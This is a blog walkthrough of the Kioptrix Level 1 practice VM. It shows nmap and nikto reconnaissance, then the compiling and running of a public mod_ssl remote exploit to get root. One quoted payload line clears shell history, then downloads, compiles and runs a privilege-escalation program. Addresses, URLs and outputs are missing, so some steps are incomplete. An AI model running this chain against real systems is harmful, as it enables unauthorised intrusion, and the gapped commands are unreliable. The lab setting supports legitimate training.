Kioptrix Level 1 – Walkthrough

The Kioptrix series of vulnerable VMs closely resemble the material presented in the PWK course, and the OCSP exam. Kioptrix Level 1 starts out very easy, so let’s get started:

Once we have the VM loaded in bridged adapter mode (directly connected to physical network), let’s quickly scan our subnet for the machine:

# nmap -sS -T5


Our output shows that our target is at Let’s perform a direct scan that fingerprints open ports/services:

# nmap -sV -sT -A -T4 -sC


Which gives the following output:


Notably, this server is running a very outdated version of Apache and OpenSSL. We think the version of OpenSSL has a working exploit, however, let’s confirm our suspicion with a quick nikto scan:

# nikto -h


Which gives the following output:


Nikto confirms our suspicion that mod_ssl has an RCE vulnerability in versions 2.8.7 and lower. Let’s find the exploit:

# searchsploit mod_ssl 2.8.7


Searchsploit is telling us that the exploit is at /usr/share/exploitdb/platforms/unix/remote/21671.c. However, this version was a bit outdated, so I downloaded my exploit straight from exploit-db:


Now, we have to make a few changes to the source code since this exploit is a bit outdated. First, there is a hard-coded line to wget some resources from packetstormsecurity, however, their download domain changed since then. Find the following line:

#define COMMAND2 "unset HISTFILE; cd /tmp; wget; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"


and replace it with:

#define COMMAND2 "unset HISTFILE; cd /tmp; wget; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"


Now we need to import the RC4/MD5 OpenSSL libraries for compatibility with this legacy SSL version. Add the following include statements:



And compile the exploit per the instructions in the code comments:

# gcc -o pwn 764.c -lcrypto


Run the exploit with the following arguments (Note, the 0x6b argument specifies the version of apache/server platform, detailed in exploit help):

# ./pwn 0x6b


And you get a root shell:


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s